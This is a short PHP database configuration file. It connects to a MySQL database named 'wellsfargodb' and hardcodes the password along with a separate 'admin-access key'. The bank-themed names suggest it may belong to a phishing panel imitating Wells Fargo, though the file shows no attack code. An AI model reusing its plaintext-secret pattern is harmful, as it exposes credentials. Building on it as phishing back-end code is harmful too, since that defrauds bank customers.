<?php
//error_reporting(0);

$seckey='B0SS';  // Here is the admin-access key

$servername = "localhost";  // Host
$username = "wellsfargouser";  //User
$password = 'jdm/]pcai@wYNfBY'; // Password
$dbname = "wellsfargodb"; // dbname

$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("Conexion Fallida: " . $conn->connect_error);
} 
$connp = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
$connp->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);


?>
